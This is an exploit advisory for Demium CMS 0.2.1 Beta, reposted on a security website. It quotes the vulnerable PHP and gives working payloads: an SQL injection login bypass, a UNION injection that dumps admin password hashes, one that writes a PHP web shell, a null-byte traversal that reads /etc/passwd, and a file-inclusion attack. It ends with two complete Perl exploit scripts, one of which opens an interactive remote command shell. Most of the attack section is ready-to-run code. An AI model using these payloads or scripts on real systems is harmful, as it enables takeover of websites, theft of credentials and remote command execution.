首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit
来源:http://osirys.org 作者:osirys 发布时间:2009-03-02  
Demium CMS, version 0.2.1 Beta, is prone to multiple remote vulnerabilities, because of insufficient security on it. Let's see them. In this advisory
you can find vulnerabilities, afflicted source, and multiple Remote Exploit.


Credits to : Giovanni Buzzin, Osirys
Contact    : osirys[at]autistici[dot]org
Website    : http://osirys.org
Download   : http://www.demium.de/ftp/archive/demium_beta_v.0.2.1.rar


[0x01 - Authority Bypass via Sql Injection]

At first, it's vulnerable to Authority Bypass via Sql Injection. Needs Magic Quotes OFF to work, because CMS dosn't stripslash on
POST data.

Vulnerable file is: /[path]/index_admin.php
[CODE]
$username = $_POST['user'];
$pw = md5($_POST['pw']);
$sql = "SELECT * FROM cms_profile WHERE profile_username = '$username' AND profile_password = '$pw' AND profile_aktiv=1;";
$result = mysql_query($sql);
$failure=true;
while($row = mysql_fetch_assoc($result))
{
$failure=false;
setcookie("login_pw", $pw, (time()+(60*60*24*365)));
setcookie("login_user", $username, (time()+(60*60*24*365)));
header("Location: /demium_beta_v.0.2.1//index_admin.php?loading=1");
}
}
[/CODE]

To exploit this vulnerability, and become Administrator, just put this in username form: admin_user' or '1=1
Where admin_user is the real nickname of the Administrator, by default: admin.

[/0x01]

[0x02 - Remote SQL Injection]

Multiple SQL Injection vulnerabilities found on this CMS. I just report the first one that I found. Needs Magic Quotes needs to be OFF
        because this CMS doesn't stripslash on GET incoming data.

Vulnerable file is: /[path]/tracking.php
[CODE]

<?php
### Kat-Tracking ###
$follow=$_GET['follow_kat'];
$check=FALSE;
include('config/db_file.php');
include('logging/tracking.php');

$sql="SELECT tracking_kat_target FROM cms_tracking_kat WHERE tracking_kat_id='$follow';";
$result=mysql_query($sql);
while($row=mysql_fetch_assoc($result))
{
$check=TRUE;
// code
if($check==TRUE)
{
?>
<script language="javascript">
window.setTimeout("location.replace('<?php echo $target; ?>')","0");
</script>
<?php
}

[/CODE]

$follow comes directly from GET, and it's put in the SQL query without been sanized or filtered. If the SQL query is TRUE, rows will
be printed on the url.

Exploit to obtain admin's password: /[path]/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*
Exploit to create a shell:          /[path]/tracking.php?follow_kat=osirys' union select '<?php system($_GET[cmd]); ?>' into outfile '/tmp/sh_spawn_ownz.txt

Exploit #1 will produce a GET request to a non existing file, since after the exploit the remote user will be redirected to host/sql_output/.html
Testing this SQL Injection in local I got redirected to this URL: http://localhost/admin:5f4dcc3b5aa765d61d8327deb882cf99/.html , producing the classic:
The requested URL /admin:5f4dcc3b5aa765d61d8327deb882cf99/.html was not found on this server.

Exploit #2 just create a file called "sh_spawn_ownz.txt" with "<?php system($_GET[cmd]); ?>" as content, yes, a Remote Shell. With LFI vulnerability the remote user will
be able to include the created file and executes command.

Exploit provided at the end of the adviosory.


[/0x02]

[0x03 - Remote File Disclosure]

It's also vulnerable to File Disclore, with a GET request a remote user is able to read files content. It's not a file inclusion, but a fread
of a local file. Let's see the vulnerable code.

Vulnerable file is: /[path]/urheber.php
[CODE]
<?php
$fname=$_GET['name'];
if($handle = @fopen("template/".$fname."/agb.cff", "r"))
{
$contents = fread ($handle, filesize ("template/".$fname."/agb.cff"));
$contents = str_replace("\n", "<br>", $contents);
echo $contents;
}
// Other code
[/CODE]

$fname comes directly from GET, without been cheeked before. From get we can se it's value, and adding a NULL BYTE %00 a remote user will
be able to read the content of the selected file.
Attach example: /[path]/urheber.php?name=../content.php%00
        This request will show /[path]/content.php source code.
        Attach example #2 : /[path]/urheber.php?name=../../../../../../../../../../etc/passwd%00

[/0x03]

[0x04 - Local File Inclusion]

This CMS, it's also affected to Local File Inclusion, a remote user will able to include and execute local file on the server.
I coded then a simple exploit to obtain a Remote Command Execution, creating a malicious file on the server, to include it then with the LFI.

Vulnerable file is: /[path]/content.php
[CODE]
<?php
include('config/db_file.php');
include('config/rights.php');
$include = "overview";
if($_GET['include'])
$include = $_GET['include'];
if($_COOKIE['login_user'] && $_COOKIE['login_pw'])
@include('modules/'.$include.'.php');
?>
[/CODE]

In case of remote user's user and password cookies, the script will include GET data, simple Perl sploit at the end of the advisory.

[/0x04]



#########
Exploits section now.
####


[$$ - Local File Inclusion Exploit]

#!/usr/bin/perl

# LFI Sploit
# by Osirys

use IO::Socket;

my $host   = $ARGV[0];

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

&exploit;

sub exploit () {
    print "\n[*] Include: ";
    chomp($l_file = <STDIN>);

    print "\n";
    $l_file !~ /exit/ || die "Exiting ..";
    if ($l_file !~ /%00^/) {
        $l_file = $l_file."%00";
    }

    my $url = $path."/content.php?include=".$l_file;

    my $data = "GET ".$url." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Keep-Alive: 300\r\n".
               "Connection: keep-alive\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
               "Content-Length: 0\r\n\r\n".
               "\r\n";

    my $socket   =  new IO::Socket::INET(
                                             PeerAddr => $h0st,
                                             PeerPort => '80',
                                             Proto    => 'tcp',
                                        ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    $socket->send($data);

    my $count = 0;
    while (my $e = <$socket>) {
        $count++;
        if ($count > 9) {
            chomp($e);
            print "$e\n";
        }
    }

    &exploit;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.+)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.+)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}

sub banner {
    print "\n".
          "  --------------------------- \n".
          "     Demium CMS LFI sploit    \n".
          "           by Osirys          \n".
          "  --------------------------- \n\n";
}

sub help () {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}

[/$$]







[$$$ - Remote Command Execution Exploit via SQL Injection and Local File Inclusion (Works with mq Off)]

#!/usr/bin/perl

# RCE Exploit
# Step 1 => Creating a remote Shell in /tmp via SQL Injection
# Step 2 => Including via LFI remote Shell, executing your CMDs

# by Giovanni Buzzin, Osirys

# ----------------------------------------------------------------------------
# Exploit in action [>!]
# ----------------------------------------------------------------------------
# osirys[~]>$ perl sp1.txt http://localhost/demium_beta_v.0.2.1/

#   ---------------------------
#      Demium CMS RCE sploit
#            (SQL-LFI)
#            by Osirys
#   ---------------------------

# [*] Getting admin login details ..
# [$] User: admin
# [$] Pass: 5f4dcc3b5aa765d61d8327deb882cf99

# [*] Creating remote Shell via SQL Injection ..
# [*] Spawning remote Shell via LFI ..

# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pwd
# /home/osirys/web/demium_beta_v.0.2.1
# shell[localhost]$> exit
# [-] Quitting ..

# osirys[~]>$
# ----------------------------------------------------------------------------

use IO::Socket;
use LWP::UserAgent;

my $host   = $ARGV[0];
my $rand = int(rand 50);

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

print "[*] Getting admin login details ..\n";

my $url = $host."/tracking.php?follow_kat=osirys' union select concat(profile_username,0x3a,profile_password) from cms_profile order by '*";
my $re = get_req($url);
if ($re =~ /replace\('\/(.+):(.+)\/.html/) {
    $user = $1;
    $pass = $2;
    print "[\$] User: $user\n";
    print "[\$] Pass: $pass\n";
}
else {
    print "[-] Can't extract admin details\n\n";
}

print "\n[*] Creating remote Shell via SQL Injection ..\n";

my $code = "<?php echo \"0xExec\";system(\$_GET[cmd]);echo \"ExeCx0\" ?>";
my $file = "/tmp/sh_spawn_ownzzzzz".$rand.".txt";
my $attack  = $host."/tracking.php?follow_kat=osirys' union select '".$code."' into outfile '".$file;
get_req($attack);

print "[*] Spawning remote Shell via LFI ..\n\n";
&exploit;

sub exploit {
    my $file = "../../../../../../../../..".$file;
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    chomp($cmd = <STDIN>);
    $cmd !~ /exit/ || die "[-] Quitting ..\n\n";

    my $url = $path."/content.php?include=".$file."%00&cmd=".$cmd;

    my $data = "GET ".$url." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Keep-Alive: 300\r\n".
               "Connection: keep-alive\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
               "Content-Length: 0\r\n\r\n".
               "\r\n";

    my $socket   =  new IO::Socket::INET(
                                             PeerAddr => $h0st,
                                             PeerPort => '80',
                                             Proto    => 'tcp',
                                        ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

    $socket->send($data);

    my @tmp_out;
    my $stop;
    while ((my $e = <$socket>)&&($stop != 1)) {
        if ($e =~ /ExeCx0/) {
            $stop = 1;
        }
        push(@tmp_out,$e);
    }

    $stop == 1 || die "[-] Can't include remote Shell\n\n";

    my $re = join '', @tmp_out;
    my $content = tag($re);
    if ($content =~ /0xExec(.+)\*ExeCx0/) {
        my $out = $1;
        $out =~ s/\$/ /g;
        $out =~ s/\*/\n/g;
        chomp($out);
        print "$out\n";
        &exploit;
    }
    else {
        $c++;
        $cmd =~ s/\n//;
        print "bash: ".$cmd.": command not found\n";
        $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
        &exploit;
    }
}

sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return($response->content);
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.+)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub get_input() {
    my $host = $_[0];
    $host =~ /http:\/\/(.+)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return($full_det);
}

sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
}

sub banner {
    print "\n".
          "  --------------------------- \n".
          "     Demium CMS RCE sploit    \n".
          "           (SQL-LFI)          \n".
          "           by Osirys          \n".
          "  --------------------------- \n\n";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Bad hostname! \n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}

[/$$$]


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hex Workshop v6 (.HEX File) Lo
·动易SiteWeaver6.6版最新漏洞利
·Orbit <= 2.4 Long Hostname Rem
·POP Peeper 3.4.0.0 UIDL Remote
·Coppermine Photo Gallery <= 1.
·Proof of concept denial of ser
·Apple MACOS X xnu <= 1228.x Lo
·POP Peeper version 3.4.0.0 UID
·pPIM 1.0 Multiple Remote Vulne
·MDPro Module My_eGallery (pid)
·HTC Touch vCard over IP Denial
·Adobe Acrobat Reader JBIG2 Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved